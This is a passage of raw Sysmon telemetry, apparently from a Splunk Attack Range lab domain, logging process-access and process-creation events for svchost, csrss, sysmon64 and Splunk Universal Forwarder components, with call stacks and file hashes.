.dll+51821 10341000x8000000000000000245412Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245411Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245410Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245409Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245408Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245407Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-5168-6063-A322-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245406Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.968{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5168-6063-A322-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245405Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.969{CB4067E1-5168-6063-A322-00000000AF01}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245404Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:20.906{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=962C4E8BFBB20A0AC00E84BDAD329A86,SHA256=6B520607B50B5235594EF04FEDCCF812ACD7247ACA95DDFE967F3712362D20AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060811Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:21.983{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33B2D5CD4AD4FC8BD9CFA161CEF0CB3,SHA256=E18F5624A2623E122FFD6569D0089DC2948847D555E6DDC0028BE1D05780751B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245430Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5169-6063-A422-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245429Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245428Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245427Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245426Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245425Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245424Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245423Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245422Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245421Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245420Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-5169-6063-A422-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245419Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.640{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5169-6063-A422-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245418Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:21.641{CB4067E1-5169-6063-A422-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245459Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-516A-6063-A622-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245458Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245457Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245456Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245455Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 